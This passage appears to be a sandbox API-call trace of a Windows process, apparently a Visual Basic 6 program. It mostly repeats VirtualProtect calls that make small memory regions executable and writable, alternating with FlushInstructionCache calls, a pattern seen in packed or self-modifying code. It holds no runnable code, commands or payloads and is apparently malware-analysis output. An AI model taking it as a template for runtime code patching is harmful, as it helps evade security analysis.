dwSize=0x14) returned 1 [0105.046] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.046] GetCurrentProcess () returned 0xffffffff [0105.046] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0105.046] GetCurrentProcess () returned 0xffffffff [0105.046] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0105.046] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.047] GetCurrentProcess () returned 0xffffffff [0105.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0105.047] GetCurrentProcess () returned 0xffffffff [0105.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0105.047] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.047] GetCurrentProcess () returned 0xffffffff [0105.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0105.047] GetCurrentProcess () returned 0xffffffff [0105.047] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0105.047] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.048] GetCurrentProcess () returned 0xffffffff [0105.048] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0105.048] GetCurrentProcess () returned 0xffffffff [0105.048] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0105.048] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.049] GetCurrentProcess () returned 0xffffffff [0105.049] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0105.049] GetCurrentProcess () returned 0xffffffff [0105.049] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0105.049] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.049] GetCurrentProcess () returned 0xffffffff [0105.049] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0105.049] GetCurrentProcess () returned 0xffffffff [0105.049] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0105.049] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.050] GetCurrentProcess () returned 0xffffffff [0105.050] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0105.050] GetCurrentProcess () returned 0xffffffff [0105.050] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0105.050] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.050] GetCurrentProcess () returned 0xffffffff [0105.050] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0105.050] GetCurrentProcess () returned 0xffffffff [0105.050] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0105.050] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.051] GetCurrentProcess () returned 0xffffffff [0105.051] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0105.051] GetCurrentProcess () returned 0xffffffff [0105.051] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0105.051] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.051] GetCurrentProcess () returned 0xffffffff [0105.051] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0105.051] GetCurrentProcess () returned 0xffffffff [0105.051] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0105.051] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.052] GetCurrentProcess () returned 0xffffffff [0105.052] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0105.052] GetCurrentProcess () returned 0xffffffff [0105.052] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0105.052] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.052] GetCurrentProcess () returned 0xffffffff [0105.053] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0105.054] GetAsyncKeyState (vKey=3) returned 0 [0105.054] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.054] CRetailMalloc_Alloc () returned 0xcbddb68 [0105.054] memcpy (in: _Dst=0xaf5168, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.054] memcpy (in: _Dst=0xcbddb88, _Src=0x197724, _Size=0x18 | out: _Dst=0xcbddb88) returned 0xcbddb88 [0105.054] CRetailMalloc_Realloc () returned 0xcbddb68 [0105.054] CRetailMalloc_Free () returned 0x1 [0105.054] GetCurrentProcess () returned 0xffffffff [0105.054] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0105.054] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.055] GetCurrentProcess () returned 0xffffffff [0105.055] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0105.055] GetCurrentProcess () returned 0xffffffff [0105.055] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0105.055] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.056] GetCurrentProcess () returned 0xffffffff [0105.056] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0105.056] GetCurrentProcess () returned 0xffffffff [0105.056] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0105.056] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.056] GetCurrentProcess () returned 0xffffffff [0105.056] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0105.056] GetCurrentProcess () returned 0xffffffff [0105.056] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0105.056] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.057] GetCurrentProcess () returned 0xffffffff [0105.057] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0105.057] GetCurrentProcess () returned 0xffffffff [0105.057] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0105.057] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.058] GetCurrentProcess () returned 0xffffffff [0105.058] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0105.058] GetCurrentProcess () returned 0xffffffff [0105.058] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0105.058] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.058] GetCurrentProcess () returned 0xffffffff [0105.058] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0105.058] GetCurrentProcess () returned 0xffffffff [0105.058] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0105.058] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.059] GetCurrentProcess () returned 0xffffffff [0105.059] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0105.059] GetCurrentProcess () returned 0xffffffff [0105.059] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0105.059] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.059] GetCurrentProcess () returned 0xffffffff [0105.059] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0105.059] GetCurrentProcess () returned 0xffffffff [0105.059] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0105.059] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.060] GetCurrentProcess () returned 0xffffffff [0105.060] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0105.060] GetCurrentProcess () returned 0xffffffff [0105.060] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0105.060] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.060] GetCurrentProcess () returned 0xffffffff [0105.060] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0105.060] GetCurrentProcess () returned 0xffffffff [0105.061] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0105.061] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.061] GetCurrentProcess () returned 0xffffffff [0105.061] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0105.061] GetCurrentProcess () returned 0xffffffff [0105.061] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0105.061] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.061] GetCurrentProcess () returned 0xffffffff [0105.061] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0105.062] GetCurrentProcess () returned 0xffffffff [0105.062] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0105.062] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.062] GetCurrentProcess () returned 0xffffffff [0105.062] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0105.062] GetCurrentProcess () returned 0xffffffff [0105.062] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0105.062] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.063] GetCurrentProcess () returned 0xffffffff [0105.063] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0105.063] GetCurrentProcess () returned 0xffffffff [0105.063] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0105.063] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.063] GetCurrentProcess () returned 0xffffffff [0105.063] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0105.063] GetCurrentProcess () returned 0xffffffff [0105.063] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0105.063] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.064] GetCurrentProcess () returned 0xffffffff [0105.064] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0105.064] GetCurrentProcess () returned 0xffffffff [0105.064] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0105.064] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.064] GetCurrentProcess () returned 0xffffffff [0105.064] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0105.064] GetCurrentProcess () returned 0xffffffff [0105.064] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0105.065] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.065] GetCurrentProcess () returned 0xffffffff [0105.065] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0105.065] GetCurrentProcess () returned 0xffffffff [0105.065] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0105.065] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.066] GetCurrentProcess () returned 0xffffffff [0105.066] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0105.066] GetCurrentProcess () returned 0xffffffff [0105.066] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0105.066] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.066] GetCurrentProcess () returned 0xffffffff [0105.066] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0105.066] GetCurrentProcess () returned 0xffffffff [0105.066] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0105.066] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.067] GetCurrentProcess () returned 0xffffffff [0105.067] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0105.067] GetCurrentProcess () returned 0xffffffff [0105.067] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0105.067] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.067] GetCurrentProcess () returned 0xffffffff [0105.067] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0105.067] GetCurrentProcess () returned 0xffffffff [0105.067] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0105.067] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.068] GetCurrentProcess () returned 0xffffffff [0105.068] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0105.068] GetCurrentProcess () returned 0xffffffff [0105.068] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0105.068] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.069] GetCurrentProcess () returned 0xffffffff [0105.069] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0105.069] GetCurrentProcess () returned 0xffffffff [0105.069] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0105.069] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.070] GetCurrentProcess () returned 0xffffffff [0105.070] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0105.070] GetCurrentProcess () returned 0xffffffff [0105.070] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0105.070] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.070] GetCurrentProcess () returned 0xffffffff [0105.070] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0105.070] GetCurrentProcess () returned 0xffffffff [0105.070] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0105.070] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.071] GetCurrentProcess () returned 0xffffffff [0105.071] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0105.071] GetCurrentProcess () returned 0xffffffff [0105.071] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0105.071] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.072] GetCurrentProcess () returned 0xffffffff [0105.072] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0105.072] GetCurrentProcess () returned 0xffffffff [0105.072] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0105.072] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.072] GetCurrentProcess () returned 0xffffffff [0105.072] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0105.072] GetCurrentProcess () returned 0xffffffff [0105.073] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0105.073] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.126] GetCurrentProcess () returned 0xffffffff [0105.126] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0105.126] GetCurrentProcess () returned 0xffffffff [0105.126] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0105.126] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.127] GetCurrentProcess () returned 0xffffffff [0105.127] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0105.128] GetAsyncKeyState (vKey=3) returned 0 [0105.128] GetAsyncKeyState (vKey=3) returned 0 [0105.128] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.128] CRetailMalloc_Alloc () returned 0xcbddbc8 [0105.128] memcpy (in: _Dst=0xaf5168, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.128] memcpy (in: _Dst=0xcbddbe8, _Src=0x197724, _Size=0x18 | out: _Dst=0xcbddbe8) returned 0xcbddbe8 [0105.128] CRetailMalloc_Realloc () returned 0xcbddbc8 [0105.128] CRetailMalloc_Free () returned 0x1 [0105.128] GetCurrentProcess () returned 0xffffffff [0105.128] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0105.128] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.129] GetCurrentProcess () returned 0xffffffff [0105.129] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0105.129] GetCurrentProcess () returned 0xffffffff [0105.129] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0105.129] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.129] GetCurrentProcess () returned 0xffffffff [0105.129] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0105.129] GetCurrentProcess () returned 0xffffffff [0105.129] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0105.129] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.130] GetCurrentProcess () returned 0xffffffff [0105.130] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0105.130] GetCurrentProcess () returned 0xffffffff [0105.130] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0105.130] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.130] GetCurrentProcess () returned 0xffffffff [0105.130] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0105.130] GetCurrentProcess () returned 0xffffffff [0105.130] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0105.130] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.131] GetCurrentProcess () returned 0xffffffff [0105.131] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0105.131] GetCurrentProcess () returned 0xffffffff [0105.131] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0105.131] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.132] GetCurrentProcess () returned 0xffffffff [0105.132] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0105.132] GetCurrentProcess () returned 0xffffffff [0105.132] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0105.132] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.132] GetCurrentProcess () returned 0xffffffff [0105.133] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0105.133] GetCurrentProcess () returned 0xffffffff [0105.133] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0105.133] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.133] GetCurrentProcess () returned 0xffffffff [0105.133] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0105.133] GetCurrentProcess () returned 0xffffffff [0105.133] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0105.133] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.134] GetCurrentProcess () returned 0xffffffff [0105.134] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0105.134] GetCurrentProcess () returned 0xffffffff [0105.134] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0105.134] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.134] GetCurrentProcess () returned 0xffffffff [0105.134] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0105.134] GetCurrentProcess () returned 0xffffffff [0105.134] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0105.134] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.135] GetCurrentProcess () returned 0xffffffff [0105.135] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0105.135] GetCurrentProcess () returned 0xffffffff [0105.135] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 